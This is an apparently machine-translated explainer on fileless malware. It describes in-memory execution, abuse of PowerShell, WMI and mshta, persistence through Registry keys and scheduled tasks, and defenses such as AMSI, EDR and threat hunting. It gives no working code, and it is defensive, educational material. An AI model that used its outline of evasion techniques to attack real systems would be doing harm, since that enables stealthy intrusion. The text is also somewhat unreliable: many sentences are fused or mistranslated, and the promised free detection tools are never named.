What is “malware without persistent files” and how to detect it with free tools

The appearance of malware without persistent files This has been a real headache for security teams. We're not dealing with the typical virus you "catch" when deleting an executable from the disk, but with threats that live in memory, abuse legitimate system tools, and, in many cases, leave hardly any usable forensic trace.

This type of attack has become especially popular among advanced groups and cybercriminals seeking evade traditional antivirus software, steal data, and remain hidden for as long as possible. Understanding how they work, what techniques they use, and how to detect them is key for any organization that wants to take cybersecurity seriously today.

What is fileless malware and why is it such a concern?

When we talk about fileless malware We're not saying that not a single byte is involved, but that the malicious code It is not stored as a classic executable file on disk from the endpoint. Instead, it runs directly in memory or is hosted in less visible containers such as the Registry, WMI, or scheduled tasks.

In many scenarios, the attacker relies on tools already present in the system—PowerShell, WMI, scripts, signed Windows binaries—to load, decrypt, or execute payloads directly into RAMThis way, it avoids leaving obvious executables that a signature-based antivirus could detect in a normal scan.

Furthermore, part of the attack chain can be "fileless" and another part can use the file system, so we are talking about more than one spectrum of fileless techniques that of a single malware family. That's why there isn't a single, closed definition, but rather several categories depending on the degree of impact they leave on the machine.

Main characteristics of malware without persistent files

A key property of these threats is their memory-centric executionThe malicious code is loaded into RAM and executed within legitimate processes, without requiring a stable malicious binary on the hard drive. In some cases, it is even injected into critical system processes for better camouflage.

Another important feature is the unconventional persistenceMany fileless campaigns are purely volatile and disappear after a reboot, but others manage to reactivate using Registry Autorun keys, WMI subscriptions, scheduled tasks, or BITS, so that the "visible" artifact is minimal and the real payload lives back in memory each time.

This approach greatly reduces the effectiveness of the signature-based detectionSince there is no fixed executable to analyze, what you often see is a perfectly legitimate PowerShell.exe, wscript.exe, or mshta.exe, launched with suspicious parameters or loading obfuscated content.

Finally, many actors combine fileless techniques with other types of malware such as Trojans, ransomware, or adware, resulting in hybrid campaigns that mix the best (and worst) of both worlds: persistence and stealth.

Types of fileless threats according to their footprint on the system

Several security manufacturers They classify "fileless" threats according to the trace they leave on the computer. This taxonomy helps us understand what we are seeing and how to investigate it.

Type I: no visible file activity

At the most stealthy end we find malware that It writes absolutely nothing to the file systemThe code arrives, for example, through network packets that exploit a vulnerability (such as EternalBlue), is injected directly into memory, and is maintained, for example, as a backdoor in the kernel (DoublePulsar was an emblematic case).

In other scenarios, the infection resides in BIOS firmware, network cards, USB devices, or even subsystems within the CPUThis type of threat can survive operating system reinstalls, disk formatting, and even some complete reboots.

The problem is that most security solutions They do not inspect firmware or microcodeAnd even if they do, remediation is complex. Fortunately, these techniques are usually reserved for highly sophisticated actors and are not the norm in mass attacks.

Type II: Indirect use of files

A second group is based on contain the malicious code in structures stored on diskBut not as traditional executables, but in repositories that mix legitimate and malicious data, difficult to clean without damaging the system.

Typical examples are scripts stored in the WMI repository, obfuscated chains in registry keys or scheduled tasks that launch dangerous commands without a clear malicious binary. Malware can install these entries directly from the command line or a script and then remain virtually invisible.

Although technically there are files involved (the physical file where Windows stores the WMI repository or the Registry hive), for practical purposes we are talking about fileless activity because there is no obvious executable that can simply be quarantined.

Type III: Requires files to function

The third type includes threats that They use files, but in a way that is not very useful for detection.A well-known example is Kovter, which registers random extensions in the Registry so that, when a file with that extension is opened, a script is executed via mshta.exe or a similar native binary.

These decoy files contain irrelevant data, and the real malicious code It is retrieved from other Registry keys or internal repositories. Although there is "something" on disk, it is not easy to use it as a reliable indicator of compromise, much less as a direct cleanup mechanism.

Most common entry vectors and points of infection

Beyond footprint classification, it's important to understand how This is where malware without persistent files comes into play. In everyday life, attackers often combine several vectors depending on the environment and the target.

Exploits and vulnerabilities

One of the most direct paths is the abuse of remote code execution (RCE) vulnerabilities in browsers, plugins (like Flash back in the day), web applications, or network services (SMB, RDP, etc.). The exploit injects shellcode that directly downloads or decodes the malicious payload into memory.

In this model, the initial file can be on the network (exploits type WannaCryor in a document that the user opens, but The payload is never written as an executable to disk: it is decrypted and executed on the fly from RAM.

Malicious documents and macros

Another heavily exploited avenue is the Office documents with macros or DDEas well as PDFs designed to exploit reader vulnerabilities. A seemingly harmless Word or Excel file may contain VBA code that launches PowerShell, WMI, or other interpreters to download code, execute commands, or inject shellcode into trusted processes.

Here the file on disk is “only” a data container, while the actual vector is the application's internal scripting engineIn fact, many mass spam campaigns have abused this tactic to deploy fileless attacks on corporate networks.

Legitimate scripts and binaries (Living off the Land)

Attackers love the tools that Windows already provides: PowerShell, wscript, cscript, mshta, rundll32, regsvr32Windows Management Instrumentation, BITS, etc. These signed and trusted binaries can execute scripts, DLLs, or remote content without the need for a suspicious "virus.exe".

By passing malicious code as command line parametersEmbedding it in images, encrypting and decoding it in memory, or storing it in the Registry, ensures that the antivirus only sees activity from legitimate processes, making detection based solely on files much more difficult.

Compromised hardware and firmware

At an even lower level, advanced attackers can infiltrate BIOS firmware, network cards, hard drives, or even CPU management subsystems (such as Intel ME or AMT). This type of malware runs below the operating system and can intercept or modify traffic without the OS being aware of it.

Although it's an extreme scenario, it illustrates the extent to which a fileless threat can Maintain persistence without touching the OS file systemand why classic endpoint tools fall short in these cases.

How a malware attack without persistent files works

At the flow level, a fileless attack is quite similar to a file-based one, but with relevant differences in how the payload is implemented and how access is maintained.

1. Initial access to the system

It all begins when the attacker gains a first foothold: a phishing email with malicious link or attachment, an exploit against a vulnerable application, stolen credentials for RDP or VPN, or even a tampered USB device.

In this phase, the following is used: social engineeringmalicious redirects, malvertising campaigns, or malicious Wi-Fi attacks to trick the user into clicking where they shouldn't or to exploit services exposed on the Internet.

2. Execution of malicious code in memory

Once that first entry is gained, the fileless component is triggered: an Office macro launches PowerShell, an exploit injects shellcode, a WMI subscription triggers a script, etc. The goal is load malicious code directly into RAMeither by downloading it from the Internet or by reconstructing it from embedded data.

From there, the malware can escalate privileges, move laterally, steal credentials, deploy webshells, install RATs, or encrypt dataall of this is supported by legitimate processes to reduce noise.

3. Establishing persistence

Among the usual techniques are:

• Autorun Keys in the Registry that execute commands or scripts when logging in.
• scheduled tasks that launch scripts, legitimate binaries with parameters, or remote commands.
• WMI Subscriptions that trigger code when certain system events occur.
• Use of BITS for periodic downloads of payloads from command and control servers.

In cases, the persistent component is minimal and serves only to reinject the malware into memory every time the system starts up or a specific condition is met.

4. Actions on targets and exfiltration

With persistence assured, the attacker focuses on what really interests him: stealing information, encrypting it, manipulating systems, or spying for monthsExfiltration can be done via HTTPS, DNS, covert channels, or legitimate services. In real-world incidents, knowing What to do in the first 24 hours after a hack can make a difference.

In APT attacks, it is common for the malware to remain silent and stealthy for long periods, building additional back doors to ensure access even if part of the infrastructure is detected and cleared.

Capabilities and types of malware that can be fileless

Virtually any malicious function that classic malware can perform can be implemented by following this approach fileless or semi-filelessWhat changes is not the objective, but the way the code is deployed.

Malware residing only in memory

This category includes payloads that They live exclusively in the memory of the process or the kernel.Modern rootkits, advanced backdoors, or spyware can load into the memory space of a legitimate process and remain there until the system is restarted.

These components are especially difficult to see with disk-oriented tools, and force the use of live memory analysis, EDR with real-time inspection or advanced forensic capabilities.

Windows Registry-based malware

Another recurring technique is to store encrypted or obfuscated code in Registry keys and use a legitimate binary (such as PowerShell, MSHTA, or rundll32) to read, decode, and execute it in memory.

The initial dropper can self-destruct after writing to the Registry, so all that remains is a mixture of seemingly harmless data that They activate the threat every time the system starts up or every time a specific file is opened.

Ransomware and fileless Trojans

The fileless approach is not incompatible with very aggressive loading methods such as the ransomwareThere are campaigns that download, decrypt, and execute the entire encryption in memory using PowerShell or WMI, without leaving the ransomware executable on disk.

Similarly, remote access trojans (RATs)Keyloggers or credential thieves can operate in a semi-fileless manner, loading modules on demand and hosting the main logic in legitimate system processes.

Exploitation kits and stolen credentials

Web exploit kits are another piece of the puzzle: they detect installed software, They select the appropriate exploit and inject the payload directly into memory., often without saving anything at all to disk.

On the other hand, the use of stolen credentials It is a vector that fits very well with fileless techniques: the attacker authenticates as a legitimate user and, from there, abuses native administrative tools (PowerShell Remoting, WMI, PsExec) to deploy scripts and commands that leave no classic traces of malware.

Why is fileless malware so difficult to detect?

The underlying reason is that this type of threat is specifically designed to bypass traditional layers of defensebased on signatures, whitelists, and periodic file scans.

If the malicious code is never saved as an executable on disk, or if it hides in mixed containers like WMI, the Registry, or firmware, traditional antivirus software has very little to analyze. Instead of a "suspicious file," what you have are legitimate processes that behave anomalously.

Furthermore, it radically blocks tools such as PowerShell, Office macros, or WMI. It is not viable in many organizationsBecause they are essential for administration, automation, and daily operations. This forces advocates to tread very carefully.

Some vendors have tried to compensate with quick fixes (generic PowerShell blocking, total macro disabling, cloud-only detection, etc.), but these measures are usually insufficient or excessively disruptive for the business.

Modern strategies for detecting and stopping fileless malware

To confront these threats, it is necessary to go beyond simply scanning files and adopt a focused approach. behavior, real-time telemetry, and deep visibility of the final point.

Behavior and memory monitoring

An effective approach involves observing what the processes actually do: what commands they execute, what resources they access, what connections they establishhow they relate to each other, etc. Although thousands of malware variants exist, malicious behavior patterns are much more limited. This can also be complemented with the Advanced detection with YARA.

Modern solutions combine this telemetry with in-memory analytics, advanced heuristics, and automatic learning to identify attack chains, even when the code is heavily obfuscated or has never been seen before.

Use of system interfaces such as AMSI and ETW

Windows offers technologies such as Antimalware Scan Interface (AMSI) y Event Tracing for Windows (ETW) These sources allow for the inspection of system scripts and events at a very low level. Integrating these sources into security solutions facilitates detection. malicious code just before or during its execution.

In addition, analyzing critical areas—scheduled tasks, WMI subscriptions, boot registry keys, etc.—helps to identify covert fileless persistence that could go unnoticed with a simple file scan.

Threat hunting and indicators of attack (IoA)

Since classic indicators (hashes, file paths) fall short, it is advisable to rely on indicators of attack (IoA), which describe suspicious behaviors and sequences of actions that fit with known tactics.

Threat hunting teams—internal or through managed services—can proactively search lateral movement patterns, abuse of native tools, anomalies in the use of PowerShell or unauthorized access to sensitive data, detecting fileless threats before they trigger a disaster.

EDR, XDR and SOC 24/7

Modern platforms of EDR and XDR (Endpoint detection and response at an extended level) provide the visibility and correlation needed to reconstruct the complete history of an incident, from the first phishing email to the final exfiltration.

Combined with a 24/7 operational SOCThey allow not only detection, but also contain and remedy automatically malicious activity: isolate computers, block processes, revert changes to the Registry, or undo encryption when possible.

Fileless malware techniques have changed the game: simply running an antivirus scan and deleting a suspicious executable is no longer enough. Today, defense involves understanding how attackers exploit vulnerabilities by hiding code in memory, the Registry, WMI, or firmware, and deploying a combination of behavioral monitoring, in-memory analysis, EDR/XDR, threat hunting, and best practices. Realistically reduce the impact Attacks that, by design, attempt to leave no trace where more traditional solutions look require a holistic and ongoing strategy. In case of compromise, knowing Repair Windows after a serious virus is essential.